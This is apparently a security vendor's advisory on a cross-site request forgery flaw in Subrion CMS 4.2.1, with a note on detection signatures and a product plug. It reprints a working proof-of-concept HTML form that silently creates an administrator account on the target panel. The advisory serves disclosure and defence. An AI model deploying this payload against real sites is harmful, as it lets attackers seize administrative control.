Subrion CMS 4.2.1 'Add Admin' Cross-Site Request Forgery



Application Details

Subrion is an open source PHP/My SQL content management system, and framework, that allows websites to be built for any purpose. From blogs to corporate portal.


Vulnerability

Subrion CMS is vulnerable to cross-site request forgery, caused by improper validation of user-supplied input.


Identification

By persuading an authenticated user to visit a malicious Web site, a remote attacker could send a malformed HTTP request to add more users to the system. An attacker could exploit this vulnerability to perform cross-site scripting attacks, Web cache poisoning, and other malicious activities.


<html>
<body>
<form action="http://localhost/subrion/panel/members/add/" method="post" enctype="multipart/form-data">
<input type="hidden" name="__st" value="YNXrr7MjSY0Qi0JYISJ7DRuC9Gd1zxPYwjHcFKVh" />
<input type="hidden" name="username" value="Aryan" />
<input type="hidden" name="fullname" value="AryanChehreghani" />
<input type="hidden" name="email" value="aryanchehreghani@yahoo.com" />
<input type="hidden" name="_password" value="Test1234!" />
<input type="hidden" name="_password2" value="Test1234!" />
<input type="hidden" name="usergroup_id" value="1" />
<input type="hidden" name="website" value="" />
<input type="hidden" name="phone" value="" />
<input type="hidden" name="biography" value="" />
<input type="hidden" name="facebook" value="" />
<input type="hidden" name="twitter" value="" />
<input type="hidden" name="gplus" value="" />
<input type="hidden" name="linkedin" value="" />
<input type="hidden" name="email_language" value="en" />
<input type="hidden" name="sponsored" value="0" />
<input type="hidden" name="featured" value="0" />
<input type="hidden" name="featured_end" value="2022-03-09 12:03" />
<input type="hidden" name="status" value="active" />
<input type="hidden" name="save" value="1" />
<input type="hidden" name="goto" value="list" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>


Detection

By turning this vulnerability into traffic files and matching rules, we are able to detect attempts to create an admin user via CSRF.


Coverage

Idappcom has created signatures 8022476 and 8022477 along with traffic files.


References

Subrion CMS 4.2.1 - Cross-Site Request Forgery (Add Admin) - Exploit Database

Subrion CMS 4.2.1 Cross-Site Request Forgery - Packet Storm Security


Traffic IQ

If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional